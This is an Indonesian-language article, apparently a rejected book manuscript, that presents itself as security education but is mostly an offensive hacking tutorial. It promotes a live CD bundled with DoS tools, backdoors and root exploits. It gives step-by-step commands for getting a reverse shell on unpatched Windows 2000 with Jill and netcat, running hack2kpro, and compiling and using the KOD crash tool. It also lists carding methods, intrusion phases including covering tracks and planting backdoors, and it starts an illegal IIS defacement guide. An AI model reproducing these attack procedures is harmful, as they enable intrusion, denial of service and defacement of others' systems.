(Aug 19, 2007 at 09:32 AM) - Contributed by Kresno Aji - Last Updated (Aug 19, 2007 at 09:57 AM)
Ini adalah naskah asli yang ditolak oleh penerbit, karena dianggap "terlalu vulgar". Oleh karenanya, daripada tidak
bermanfaat sama sekali lebih baik ditampilkan di sini. Semua hal yang ada dalam artikel ini, semata-mata adalah untuk
tujuan pendidikan. Semua akibat yang ditimbulkan dari artikel ini di luar tanggung jawab penulis.
Kata Pengantar
Di dalam artikel ini, kami memadukan antara konsep dan implementasi keamanan jaringan. Sebelumnya kami
melakukan eksperimen terlebih dahulu tentang cara-cara melakukan cracking, termasuk bagaimana melakukan deface
halaman utama suatu Web Server :), baik yang terhubung ke internet maupun intranet. Setelah berhasil, kemudian kami
mencoba untuk menanggulanginya sesuai dengan dokumentasi yang kami miliki dan juga metode pencegahan agar hal
tersebut tidak terjadi atau terulang kembali.
Artikel ini kami susun dengan harapan sebagai "penambah wawasan" bagi para penggemar TI, System Administrator
dan bukan untuk mengajari hal-hal negatif kepada para pemula. Namun memberi kesadaran kepada mereka yang
senantiasa melakukan hal-hal negatif untuk menghentikan tindakannya, lebih baik lagi apa bila mereka juga memberi
sumbangan dalam hal keamanan jaringan. Itu saja.
Dalam artikel ini, kami menyertakan CD bantu, masaji-slax-1.0.iso (tools/skrip) yang berkaitan dengan masalah sekuriti
internet. ISO bisa diambil di bagian download ISO Utility Linux. Kami berharap melalui buku ini, kita semua menyadari
bahwa kejahatan internet adalah suatu hal yang nyata, namun tidak perlu ditakuti, tetapi perlu tindakan nyata dari kita
semua untuk ikut menanggulanginya. Kami tidak bertanggung jawab atas penyalahgunaan informasi dan programprogram
yang disertakan dalam buku ini.
Tools / perangkat hacking yang disediakan di sini, adalah untuk kepentingan pendidikan semata dan untuk membantu
pekerjaan System Administrator dalam pengamanan sistem jaringan yang sudah dibangun.
Segala hal dan resiko yang mungkin dan bisa terjadi adalah tanggung jawab masing-masing pengguna.
Pengertian Hacking dan Cracking
Sebelum kita masuk kepada persiapan hacking, ada baiknya kalau kita sedikit membahas tentang masalah keamanan
jaringan komputer. Sehebat apapun komputer yang Anda gunakan, bila komputer tersebut sudah terhubung ke jaringan
luar atau external, apalagi ke jaringan internet, maka komputer Anda tersebut akan menjadi sasaran bagi orang usil atau
istilah kerennya hacker/cracker. Sebenarnya, apakah hacker dan cracker tersebut?
Apakah Hacker/Cracker itu?
Kadang-kadang kita pernah mendengar istilah hacker/cracker. Bila kita membicarakan masalah keamanan pada
komputer, maka kedua ekor makhluk asing ini pasti akan ikut serta di dalamnya. Cuma masalahnya, kita sering kali
rancu pada kedua istilah tersebut. seringkali kita menyamakan hacker dengan cracker. Sebenarnya apakah
Hacker/Cracker itu?
Sedikit tentang definisi hacker adalah: "orang yang suka ngutak-ngatik hardware/software yang ada di hadapannya."
Sedangkan menurut Eric S. Raymond: "originally, someone who makes furniture with an axe"
"Seorang hacker adalah mereka yang dapat memasuki sebuah sistem komputerisasi tanpa diketahui oleh pemilik atau
pengawas sistem komputerisasi tersebut. Seorang hacker pada umumnya tidak memberitahu kepada masyarakat luas
untuk memberitahukan bahwa dia dapat menembus sistem keamanan tersebut, mereka (kita katakan sebagai hacker)
selalu menghindari publikasi semacam itu, mereka pada umumnya hanya memberitahu pemilik ataupun pengawas
sistem komputerisasi tersebut guna bagi pemilik dan pengawas tersebut memperbaiki kesalahan dan lubang keamanan
pada sistem komputerisasi mereka."
Hacker adalah profesional komputer. Mereka menghabiskan sebagian besar waktunya, mendedikasikan keahlian
komputer dan segala sesuatu yang berhubungan dengan dunia TI. Orang-orang ini merupakan pakar interne,
memahami dunia komputasi. Administrator jaringan Anda, menganggap mereka memahami benar apa yang mereka
bicarakan, kebanyakan juga seorang hacker. Hacker bukanlah orang-orang yang ada dibarisan terdepan dalam perang
internet guna memperoleh akses ilegal ke komputer tanpa alasan yang kuat. Seorang hacker hanya akan mengambil
alih sistem jika hal tersebut membutuhkan proses pemikiran yang rumit, sesuatu yang menantang, dan yang akan
memberikan informasi atau membantu mereka mengklarifikasi informasi tentang bagaimana hal tersebut dilakukan. Para
hacker selalu haus ilmu pengetahuan, mempelajari lebih dalam, menyukai dan selalu ingin memperoleh lebih rinci
mengenai subyek tertentu. Para hacker dapat juga didefinisikan sebagai kelompok White Hat
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Sedangkan Cracker. Merupakan sisi gelap dari profesional keamanan komputer yang menyimpang terlalu jauh. Kaum
Script Kiddies, kaum Black Hat, orang-orang yang tanpa pengetahuan kecuali cara melakukan hacking. Kelompok ini
tidak mengetahui bagaimana komputer tersebut bekerja. Seorang cracker tidak peduli terhadap masyarakat dan tidak
memikirkan akibat dari tindakan mereka. Para Cracker dianggap hina dalam forum hacking dan identik dengan
kerusakan dan "Google". Para cracker ingin segala sesuatunya yang dikuasainya disimpan dalam piringan hitam.
Mereka tidak mencari informasi untuk diri mereka dan tergantung siapa saja yang memberikannya ke mereka. Mereka
inilah kaum wanna-be. Anda tidak ingin menjadi salah satu dari mereka bukan?
Aktivitas tindakan mereka dalam memasuki suatu sistem disebut dengan hacking atau cracking, tergantung dari
motivasi yang melatar belakangi tindakan mereka tersebut.
Dalam dunia komunikasi data global yang selalu berubah, akses Internet yang semakin terjangkau, dan cepatnya
perkembangan software, keamanan suatu sistem operasi menjadi isu yang semakin penting. Keamanan saat ini menjadi
suatu kebutuhan dasar, karena komputasi global tidak aman. Sebagai contoh, dengan berpindahnya data Anda dari titik
A ke titik B di Internet, ia mungkin melalui beberapa titik lain selama perjalanan, membuka kesempatan bagi orang lain
untuk memotongnya, atau pun merubah data Anda. Bahkan pengguna lain pada sistem Anda dapat merubah data Anda
ke sesuatu yang tidak Anda inginkan. Akses yang tidak diijinkan ke dalam sistem Anda mungkin dapat diperoleh si
penyusup, juga dikenal sebagai "cracker", yang kemudian menggunakan pengetahuannya untuk berpura-pura sebagai
Anda, mencuri informasi dari Anda, atau bahkan menolak akses Anda ke sumber daya Anda sendiri, untuk keuntungan
finansial maupun personal.
Beberapa Motivasi Penyusupan
Beberapa hal yang mungkin terjadi pada komputer yang terhubung ke jaringan, terutama bagi Anda yang bergerak di
dalam dunia bisnis, namun tanpa mengabaikan keamanan jaringan komputer Anda adalah:
- Perbuatan yang dilakukan seorang penyusup yang berhasil dalam usahanya mengakses komputer Anda. Dapatkah
penyusup membaca, menulis, atau mengeksekusi program-program yang dapat menyebabkan kerusakan ? Dapatkah
mereka menghapus data kritis ? Mencegah Anda atau perusahaan Anda menyelesaikan pekerjaan penting ? Jangan
lupa, seseorang yang memperoleh akses ke rekening Anda, atau sistem Anda, dapat pula berpura-pura sebagai Anda.
Sebagai tambahan, memiliki satu rekening yang tidak aman di sistem Anda dapat menyebabkan seluruh jaringan Anda
terganggu. Dengan adanya pemakai tunggal yang dibolehkan login menggunakan file rhost, atau dibolehkan
menggunakan pelayanan yang tidak aman, seperti tftp, Anda menghadapi risiko seorang penyusup menggunakannya
untuk masuk ke pintu Anda (get his foot in the door). Sekali, seorang penyusup memiliki rekening pemakai di sistem
Anda, atau sistem orang lain, akan dapat digunakan untuk memperoleh akses ke sistem lain atau rekening lain.
- Ancaman yang berasal dari seseorang dengan motivasi untuk memperoleh akses yang tidak diijinkan ke jaringan atau
komputer Anda. Anda perlu memutuskan siapa yang Anda percayai untuk memiliki akses ke sistem Anda, dan ancaman
apa yang dapat muncul. Terdapat beberapa macam penyusup, dan penting mengetahui beragam karakteristiknya saat
mengamankan sistem Anda.
- The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang Anda
miliki.
- The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem Anda, atau merubah web page Anda,
atau sebaliknya membuat waktu dan uang Anda kembali pulih.
- The High-Profile Intruder (Penyusup berselera Tinggi) - tipe penyusup ini berusaha menggunakan sistem Anda untuk
memperoleh popularitas dan ketenaran. Dia mungkin menggunakan sistem Anda untuk mempromosikan
kemampuannya.
- Kerentanan menggambarkan seberapa terlindung komputer Anda dari jaringan lain, dan potensi seseorang
memperoleh akses yang tidak diijinkan. Hal-hal apa yang dipertaruhkan bila seseorang masuk ke sistem Anda? Tentu
saja perhatian pemakai rumahan PPP dinamis akan berbeda dengan perusahaan yang menghubungkan mesinnya ke
Internet, atau jaringan besar lain. Berapa banyak waktu yang diperlukan untuk mengembalikan/menciptakan data yang
hilang? Investasi awal saat ini dapat menghemat puluhan kali lebih banyak jika kemudian Anda perlu menciptakan
kembali data yang hilang. Sudahkah Anda mengkaji strategi backup Anda, dan memastikan data Anda sudah benar?
Beberapa metode serangan
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- DoS: Denial of Service Attack
Adalah serangan yang dilakukan dengan cara mengirimkan paket sampah (serupa dengan ping -s 65000). Hasil dari
serangan ini adalah terhentinya layanan server (server down), dikarenakan bandwidth penuh. Serangan ini juga
mengakibatkan backbone dimana server menginduk menjadi macet, bahkan pelayanan menjadi terhenti sama sekali.
- Defacing: jenis serangan ini, adalah dengan mengganti halaman depan suatu situs, atau dengan mengganti isi, baik
sebagian atau keseluruhan dengan halaman buatan si penyusup.
- Spoofing: setangan ini dilakukan dengan cara pengalihan alamat IP dari suatu situs ke alamat yang dikehendaki oleh
si penyusup. Biasanya pengalihan dilakukan ke situs porno. Model serangan jenis ini biasanya dilakukan pada situs-situs
pemerintah atau institusi lainya, sebagai bentuk protes.
- Carding: serangan ini biasanya dilakukan oleh para 'pencuri' kartu kredit, dengan tujuan bisa mendapatkan nomor
kartu kredit secara tidak syah. Biasanya dilakukan dengan cara:
- Database exploit: pencurian database suatu situs e-commerce, sehingga bisa mendapatkan banyak nomor kartu kredit
dengan 'cuma-cuma'. http://www.mobile-tronics.com/
- Spoofing: pengalihat alamat suatu situs e-commerce menuju alamat situs dari carder, sehingga terjadi transaksi
'palsu'.
- Pembuatan situs palsu: modus ini dilakukan dengan cara membuat situs e-commerce palsu. Sehingga pada saat
terjadi 'transaksi fiktif', nomor kartu dan validasi dari pemilik asli bisa didapatkan dengan mudah.
- Kerja sama orang dalam: cara ini biasa digunakan di hotel-hotel atau di restoran dan toko-toko yang memberikan
layanan kartu kredit dalam pembayaran produknya atau jasa yang mereka berikan.
- Menggunakan keylogger: cara ini biasa terjadi di warnet atau pada layanan internet umum lainnya. Bisa dilakukan oleh
orang dalam maupun sesama pengunjung sendiri. Dengan cara menanamkan program logger pada PC sasaran.
Sehingga, bilamana terjadi transaksi online, nomor kartu dan kata sandi (password) akan tercatat secara otomatis pada
masing-masing PC.
- Root Compromise: metode ini merupakan metode teknis penyusupan yang tertinggi dibandingkan metode lainnya.
Karena menuntut pengetahuan (skill), kesabaran dan profesionalisme yang tinggi. Sehingga hanya bisa dilakukan oleh
hacker atau cracker profesional. Di sini, penyusup membutuhkan akses jaringan / internet 24 jam, beraneka PC dengan
sistem operasi yang berbeda, dan pengetahuan pemrograman serta keuletan yang tinggi.
Hasil dari root compromise ini adalah, si penyusup mendapatkan akses tertinggi atas sistem yang dikerjai. Dengan
demikian, penyusup bisa melakukan apapun, termasuk di antaranya: menyalin data penting, mengganti password
sampai dengan menghancurkan sistem.http://www.mobile-tronics.com/
Sekilas, masaji-slax
masaji-slax merupakan gubahan dari Slax Frodo, dengan beberapa penambahan, antara lain sebagai berikut:
- lynx: program browser mode text
- vim: untuk editor file
- bzip2: untuk memampatkan file
- bc: aplikasi perhitungan
- ispell: pengejaan bahasa Inggris
- iptraf: untuk monitoring jaringan
- links: browser serupa lynx dengan berbagai kelebihan
- nmap: aplikasi network scanner
- proftpd: ftp server
- rsync: aplikasi syncronizing direktori dan partisi
- tcpdump: aplikasi untuk memantau jaringan
- snort: aplikasi untuk memantau jaringan yang terenkripsi
- wget: aplikasi untuk pengambilan file di internet
- wvdial: program untuk menyambung internet via modem
- wavemon: program untuk monitoring jaringan nirkabelhttp://www.mobile-tronics.com/ (wireless connection)
- traceroute: berguna untuk melakukan pelacakan situs
- nslookup: program untuk melacak alamat IP dari suatu situs / domain
- dig: program untuk mencari informasi tentang informasi suatu situs internet
Selain itu, masaji-slax bisa digunakan juga sebagai NAT Server dan Firewall Server. Pada release kedua ini, sudah
dilengkapi dengan beberapa tools atau perangkat untuk melakukan hacking atau cracking. Tools tersebut meliputi antara
lain:
- rkhunter: berguna untuk pemeriksaan keamanan internal sistem.
- targa3: Denial of Service exploit generator
- tfn2k: Tribe FloodNet, DoS dengan beraneka fungsi.
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- pot : Ping Observation Tools, scanner cepat.
- tentacle : blockir service tcp (inetd, ircd, httpd).
- sysphear : Sysklogd local denial of service
- gateway : flooder/scanner/bouncer/daemonshell exploit.
- vanila : TCP shell daemon backdoor.
- wu-ftpd : remote root exploit.melalui FTP Server
- b0rg : name server infecting root exploit
- mfv : virus 'makefile', berguna untuk menjalankan perintah shell.
- bsd_procfs: local 'root' compromise untuk FreeBSD
- connect-lnx: local 'root' compromise untuk Linux
Semua tools atau perangkat yang disertakan, dimaksudkan hanya untuk pendidikan semata. Selain itu juga ditujukan
bagi System Administrator dalam mengamankan sistem jaringan yang sudah dibangun.
Menjalankan masaji-slax Untuk menjalankan masaji-slax, Anda hanya membutuhkan sebuah PC dengan spesifikasi
minimal:
- Keluarga Pentium 2
- RAM 64 MB
- CD-ROM
- Nyalakan PC Anda
- Pada waktu mode BIOS, edit BIOS PC Anda. Pastikan sistem menjalankan CD-ROM sebagai boot pertama (first boot).
- Masukkan CD masaji-slax kedalam CD-ROM.
- Simpan konfigurasi BIOS dan lanjutkan dengan boot PC.
- Pada masaji-slax, juga dilengkapi dengan konfirmasi untuk menjalankan tombol numlock. Konfirmasi ini akan muncul
pada saat proses booting berlangsung. Seperti bisa Anda lihat pada gambar berikut ini:
- Berbeda dengan tampilan prompt pada slax, tampilan prompt masaji-slax bisa Anda lihat pada gambar berikut ini:
- Untuk menjalankan masaji-slax, masukkan user root, dan passwordnya adalah toor.
- Selanjutnya, Anda akan masuk ke prompt
- Pastikan Anda merubah password root, jika Anda ingin menjalankan masaji-slax sebagai server.
masaji-slax sebagai gateway server
Untuk menjalankan masaji-slax sebagai server NAT atau gateway server, Anda cukup mengetikkan: [root@dir:~] #
./setup-jaringan
- Selanjutnya, akan muncul konfirmasi setting jaringan, sebagai berikut: Anda ingin melakukan setting alamat IP? y/n
- Jawab "y", jika Anda memang ingin melakukakn setting jaringan. Jawab "n", jika ingin membatalkan.
- Selanjutnya Anda masukkan jenis kartu jaringan. Biasanya, pada server, terpasang lebih dari satu kartu jaringan.
Dimulai dari eth0, eth1, dan seterusnya. Seperti ditunjukkan pada contoh berikut ini: Masukkan jenis kartu jaringan
(eth0/eth1):
- Selanjutnya, masukkan alamat IP sesuai dengan yang diberikan oleh administrator jaringan di tempat Anda. Misalnya
192.168.0.1, sesuai dengan pertanyaan di bawah ini: Masukkan alamat IP:
- Pada pertanyaan berikut ini: Masukkan netmask jaringan:
Anda bisa mengisikan dengan netmask yang diijinkan oleh administrator jaringan. Biasanya adalah 255.255.255.0
- Pada pertanyaan berikut, Anda isikan alamat gateway atau alamat server, dimana Anda terhubung ke jaringan.
Misalnya, 192.168.0.254, sesuai dengan pertanyaan berikut ini:
Masukkan alamat Gateway:
- Selanjutnya, masukkan DNS 1 dan DNS 2 sesuai dengan urutan pertanyaan berikut. DNS 1 biasanya adalah alamat
IP server dan DNS 2 adalah alamat Gateway ISP di tempat Anda. Masukkan alamat DNS1:
Masukkan alamat DNS2:
- Terakhir, akan ditunjukkan hasil dari setting jaringan yang baru saja Anda lakukan. Seperti pada contoh berikut ini:
Setting jaringan yang Anda tuliskan adalah:
eth0 Link encap:Ethernet HWaddr 00:0C:6E:7F:5A:65
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
inet6 addr: fe80::20c:6eff:fe7f:5a65/64 Scope:Link
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:80351 errors:0 dropped:0 overruns:0 frame:0
TX packets:164392 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6471382 (6.1 Mb) TX bytes:237612846 (226.6 Mb)
Interrupt:10
Gateway: 192.168.0.254
Anda ingin berbagi akses internet? y/n
- Jika Anda ingin menjadikan PC Anda sebagai server NAT, Anda bisa menjawab "y" pada pertanyaan tersebut di atas.
- Jika Anda berkeinginan untuk berbagi akses internet, pastikan Anda mengisikan kelas IP yang berbeda. Misalnya,
pada eth0 diisikan kelas IP 192.168.0, maka pada eth1 diisikan kelas IP yang berbeda seperti: 192.168.1 dan
seterusnya.
Pada masaji-slax juga diberikan progra aplikasi setting-modem, buat Anda yang ingin mengakses internet
menggunakan modem, atau bagi warnet yang masih menggunakan modem telpon.
Anda cukup mengetikkan: setting-modem, pada direktori 'root'. Selanjutnya, Anda ikuti petunjuknya yang kami
usahakan semudah mungkin.
Persiapan
Pada tulisan kali ini, kami akan memberikan gambaran persipan sebelum Anda melakukan hacking suatu sistem. Anda
bisa melakukan secara lokal atau dengan melalui jaringan internet. Tentunya, jika Anda akan langsung mempraktekkan
melalui jalur internet, Anda juga harus bersiap juga menanggung resiko dari pihak yang berwajib :).
Sebaiknya kita mulai belajar hacking dari jaringan lokal. Di sini, kita mengacu pada sistem operasi Linux dan Windows.
Untuk sistem operasi Linux, Anda bisa menggunakan
Persiapan yang kita lakukan sebagai berikut:
PC server
- Hardware
- Processor Keluarga Pentium III - 500 atau yang lebih baik
- RAM 128 MB
- CD-ROM
- Software Untuk sistem operasi, Anda bisa menggunakan sistem operasi Windows 2000 atau Linux versi lama, seperti:
- RedHat Linux versi 9.0,
- Tawie Secure Linux 2.0
- SuSE Linux 8.0
- Mandrake Linux 9
- Slackware Linux 8
- dan Linux versi lama lainnya
PC Klien
Untuk PC klien, Anda cukup menggunakan spesifikasi yang sederhana, karena masaji-slax hanya berjalan pada
konsol, sehingga tidak membutuhkan spesifikasi mesin yang tinggi. Minimal spesifikasi yang dibutuhkan adalah:
- Processor keluarga Pentium III - 500 Mhz
- RAM 64 MB
- CD-ROM
Selanjutnya, Anda instalasi PC server. Jangan lupa untuk menjalankan layanan (service) berikut ini:
- Web server
- DNS server
- FTP server
- SSH server
Pada sistem operasi Windows, beberapa layanan yang perlu Anda jalankan adalah
- File Sharing
- Microsoft IIS
- Printer lokal (untuk selanjutnya di-share ke jaringan)
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Pembahasan internet hacking pada buku ini dilakukan melalui sistem operasi Linux. Jadi, jika Anda termasuk 'pemula'
dalam menggunakan Linux. Minimal, Anda harus bisa dan terbiasa menggunakan sintaks perintah seperti berikut ini:
- awk
- mknod
- more
- mount
- ping
- ps
- sed
- sort
- tar
- ifconfig
- ipfwadm
- last
- head
- tail
- gcc
- cut
- find
- ftp
- less
- vim
- nc (netcat)
- rcp
- xhost
- xterm
- syslogd
- inetd
- telnet
- ssh
- finger
- cat
- chmod
- dd
- grep
- gzip
- kill
- ln
- ls
Beberapa tahapan hacking yang harus dilakukan, meliputi:
- Footprinting Mencari rincian informasi terhadap sistem-sistem untuk dijadikan sasaran, mencakup pencarian informasi
dengan search engine, whois, dan DNS zone transfer.
- Scanning Terhadap sasaran tertentu dicari pintu masuk yang paling mungkin. Digunakan ping sweep dan port scan.
- Enumeration Analisa intensif terhadap sasaran, yang mencari user account absah, network resource and share, dan
aplikasi untuk mendapatkan mana yang proteksinya lemah.
- Gaining Access Mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses sasaran. Meliputi mengintip
dan merampas password, menebak password, serta melakukan buffer overflow.
- Escalating Privilege Bila baru mendapatkan user password di tahap sebelumnya, di tahap ini diusahakan mendapat
privilese admin jaringan dengan password cracking atau exploit sejenis getadmin, sechole, atau lc_messages.
- Pilfering Proses pengumpulan informasi dimulai lagi untuk mengidentifikasi mekanisme untuk mendapatkan akses ke
trusted sistem. Mencakup evaluasi trust dan pencarian cleartext password di registry, config file, dan user data.
- Covering Tracks Begitu diperoleh kendali penuh terhadap sistem, maka menutup jejak menjadi prioritas. Proses
menutupi jejak meliputi, pembersihan network log dan penggunaan hide tool seperti macam-macam rootkit dan file
streaming.
- Creating Backdoors Pintu belakang diciptakan pada berbagai bagian dari sistem untuk memudahkan masuk kembali
ke sistem ini dengan cara membentuk user account palsu, menjadwalkan batch job, mengubah startup file, menanamkan
servis pengendali jarak jauh serta monitoring tool, dan menggantikan aplikasi dengan trojan.
- Denial of Service Bila semua usaha di atas gagal, penyerang dapat melumpuhkan sasaran sebagai usaha terakhir.
Meliputi SYN flood, teknik-teknik ICMP, Supernuke, land/latierra, teardrop, bonk, newtear, trincoo, smurf, dan lain-lain.
Sekarang, mari kita coba bersama-sama belajar internet hacking
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Menyerang server Windows dengan Jill
Pada saat jill pertamakali di postingkan oleh kelompok yang menamakan dirinya Dark Spyrit di bugtraq, jill cukup
membuat bencana yang cukup besar bagi para pengguna Windows 2000 Server. Banyak situs telah di jebol oleh para
script kiddies dengan menggunakan tools ini.
Jill melakukan exploitasi lubang keamanan pada Windows 2000 Server dengan memanfaatkan overflow pada service
printer, untuk mendapatkan akses DOS prompt (CMD.EXE) pada komputer yang diserang tersebut.
Ada cerita menarik pada saat Jill dipublikasikan pertama kali, saat itu Microsoft selaku vendor Windows 2000 Server
tidak segera merespon keberadaan Jill ini selama hampir 2 minggu. Oleh karena itu, semua server di dunia yang
terkoneksi melalui internet dengan berbasiskan Windows 2000 Server, cukup kalangkabut dan beberapa diantara
mereka mematikan servernya selama belum ada bugfix dari Microsoft tersebut. Ini tentunya berbeda dengan sistem
opensource, dimana waktu keluarnya patch dihitung dari saat bug muncul hanya memakan waktu beberapa hari, bahkan
bisa hanya beberapa jam saja.
Berikut ini adalah tahapan dalam penggunaan program ini:
- Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut: [root@dir:~] # nc -l -p (nomor port kita) -vv
Misalnya, kita menggunakan port 12345 untuk menjalankan prompt, ketikkan perintah sebagai berikut: [root@dir:~] #
nc -l -p 12345 -vv [Enter]
Tunggu sampai muncul tampilan sebagai berikut: listening on [any] 12345 ...
- Jalankan Jill di konsole baru tersebut dengan syntax sebagai berikut : [root@dir:~] # jill [ip_address_korban]
[nomer_port_korban] [ip_address_kita]
[port_kita]
Misalnya, kita serang komputer korban (ip 192.168.0.2 dan port 80), sedangkan komputer kita mempunyai ip
192.168.0.1 dan kita sudah membuka port nomer 12345 sebagai kanal komunikasi Jill, maka syntax-nya sebagai berikut:
[root@dir:~] # jill 192.168.0.2 80 192.168.0.1 12345
- Anda kembali lagi pada konsole Anda yang menjalankan nc
- Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc tersebut akan muncul prompt
Windows 2000.
- Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah tampilan web atau bahkan
menghapus file-file di harddisk :).
Menyerang server Windows denganhackw2k
Pihak Microsoft mengumumkan adanya hole atau celah keamanan yang menimpa salah satu produknya, Windows
2000 Pro. Dimana hole atau celah keamanan ini memiliki peringkat 'high risk', sehingga bisa mengakibatkan resiko yang
fatal bagi penggunanya.Microsoft menghimbau penggunanya untuk segera melakukan update patch.
Celah ini tidak menutup kemungkinan, juga terjadi pada produk Microsoft lainnya, seperti: Windows ME, Windows XP,
Windows 2000 dan 2003.
Berikut ini adalah tahapan dalam penggunaan program ini:
- Jalankan program nc (net cat), adapun sintaks perintahnya sebagai berikut: [root@dir:~] # hack2kpro [alamat-ipsasaran]
[nomor-port]
Misalnya, kita menggunakan port 3003 untuk menjalankan prompt, ketikkan perintah sebagai berikut: [root@dir:~] #
hack2kpro 192.168.0.1 3003
Tunggu sampai muncul tampilan sebagai berikut:
-
-
Kemudian, tekan [Ctrl+C]
- Lanjutkan dengan mengetikkan sintaks perintah netcat berikut ini: [root@dir:~] # nc 192.168.0.1 3003
- Jika target adalah Windows 2000 Server yang belum di-patch, maka pada kanal nc tersebut akan muncul prompt
Windows 2000. Seperti pada contoh gambar berikut ini:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Setelah itu Anda bisa melakukan apa saja di sini, termasuk diantaranya mengubah tampilan web atau bahkan
menghapus file-file di harddisk yang bersangkutan :).
Menyerang server Windows dengan KOD
KOD atau kepanjangan dari Kiss Of Death adalah semacam tool yang digunakan untuk menyerang Windows pada port
default 139. Fungsi dari kod adalah membuat komputer terget menjadi " hang /blue screen". Kod sendiri ada suatu file
mentah dalam bentuk bahasa C. Pada pembahasan ini kami akan menerangkan bagaimana caranya kita akan mencompile
kod lalu bagai mana cara menjalankannya dan yang terakhir bagaimana hasil dari kod.
- Pertama kali yang harus kita lakukan adalah melakukan download file kod.c. Anda dapat mencarinya di search engine
atau di ftp.technotronic.com.
- Setelah Anda download, yang harus Anda lakukan selanjutnya adalah mengkompilasinya, sebelumnya kod.c hanya
berjalan di komputer dengan sistem operasi Unix/Linux. Selanjutnya Anda bisa mengompilasi file kod.c sebagai berikut :
[root@dir:~] # gcc -o kod kod.c
Untuk lebih mudahnya, kami sudah menyertakan file kod dalam bentuk jadi pada masaji-slax.
Cara penggunaannya cukup mudah, Anda tinggal ketikkan: [root@dir:~] # kod [no_ip] -p [nomor port] -t [hits]
Pertama kita cari dulu targetnya setelah ditemukan kita scan port dulu karena kita harus tahu port apa saja yang
dijalankan oleh target kita selanjutnya jika sudah diketahui maka kita bisa mencobanya. Sebagai contoh kita ambil port
139 yaitu merupakan port dari service yang dijalankan oleh Windows9.x namanya netbios-ssn. Dampak serangan bagi
port ini adalah menghambat atau mencegat semua packet yang akan keluar atau masuk dan dalam hal ini jika komputer
target sedang dalam kondisi online maka komputer tersebut tidak dapat browsing/surfing. Cara untuk mengatasi
serangan ini jika sudah terjadi adalah restart komputer. Perhatikan contoh gambar berikut :
Kelemahan pada kod ini adalah, tidak semuanya berhasil. Tergantung pada jaringan komputernya jika Anda
melakukannya pada Local Area Network (LAN) di sini. Maksud kami adalah Anda memiliki 2 buah komputer yang saling
berhubungan maka kemungikan besar dapat berhasil tetapi jika target berada di luar sasaran artinya kita harus
terhubung dengan jaringan internet dahulu ada beberapa hal yang harus diperhatikan kita berhasil atau tidak :
- Komputer target terhubung dengan internet dan komputer tersebut tidak memiliki jaringan LAN dan system yang
dijalankan Windows9x/ME di sini kita mungkin bisa berhasil.
- Komputer terget memiliki sebuah server, dan client menggunakan Windows9x/ME disini kemungkinan berhasilnya fiftyfifty
karena packet serangan kita terkadang difilter oleh server.
- Komputer target memiliki server yang memiliki firewall dan client menjalankan Windows9x/NT/ME disini ada
kemungkinan berhasil sangat kecil sekali karena sangat banyak kemungkinannya diantaranya adalah client
menggunakan WinNT dan sudah di patch atau diberi security maka sangat susah sekali ditembus kedua Windows9x ada
kemungkinan berhasil jika firewall di server tidak memblokir port 139 tadi.
Kod sebenarnya disebabkan oleh Proses dari proses igmp packet untuk Window tidak tertulis secara benar. Kod
membuat Blue Screen pada Windows 98/98 SE dan membunuh TCP stack. Ketika pengguna komputer menggunakan
komputer yang telah diserang oleh kod ini dia tetap bisa melakukan aktivitasnya tetapi tidak ada lagi TCP stack. Packet
yang ditulis oleh user akan dikirimkan tetapi tidak akan menerima jawaban. Contoh untuk situasi seperti ini adalah jika
Anda melakukan perintah ping terhadap suatu address maka icmp echo request akan di kirimkan tetapi icmp echo
replies tidak akan mengirimkan jawaban kembali. Solusi untuk para pengguna komputer yang menggunakan modem
sebagai alat koneksi ke internet adalah memutuskan hubungan internet dan menyambungkan/connect kembali. Dan
untuk pengguna komputer yang posisi jaringan komputernya adalah melalui LAN maka komputer tersebut harus
direstart.
Mengubah Tampilan Web (Defacing) Secara Illegal pada server Windows
Pada bagian ini kita akan berbagi pengalaman bagaimana cara melakukan defacing web server yang menggunakan
Microsoft Internet Information Server atau lebih kita kenal dengan nama Microsoft IIS
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Pada Microsoft Internet Information Server Atau Microsoft IIS 5.0 memiliki suatu bug yang dinamakan "UnicodeBug".
Bug tersebut dapat mengexplorasi komputer / situs hanya melalui web browser saja.
Sebelum melakukan defacing, perlu kita persiapkan beberapa hal sebagai berikut:
- Menentukan target atau sasaran untuk defacing.
- Web/internet browser yang kita gunakan untuk mengakses situs tujuan. Misalnya: FireFox, Netscape Navigator dan
lain - lain.
- Mencari server yang menggunakan Microsoft IIS. Anda bisa melakukan pemeriksaan, apakah server tujuan
menggunakan sistem operasi Windows atau bukan di situs http://www.netcraft.com
Selain hal diatas yang perlu kita perhatikan adalah, kita harus memastikan situs yang akan kita ubah tampilannya
(deface),menjalankan Microsoft IIS yang masih belum di patch pada Unicodenya
Sekarang kita memasuki tahap untuk melakukan deface. Sebelumnya ada beberapa tool yang sangat mendukung
dalam usaha defacing kita. Sebenarnya ada bermacam-macam tool yang biasa digunakan tetapi untuk saat ini kami
akan memberikan beberapa tool saja yang sekiranya sudah cukup untuk proses deface. Tool-tool tersebut diantaranya
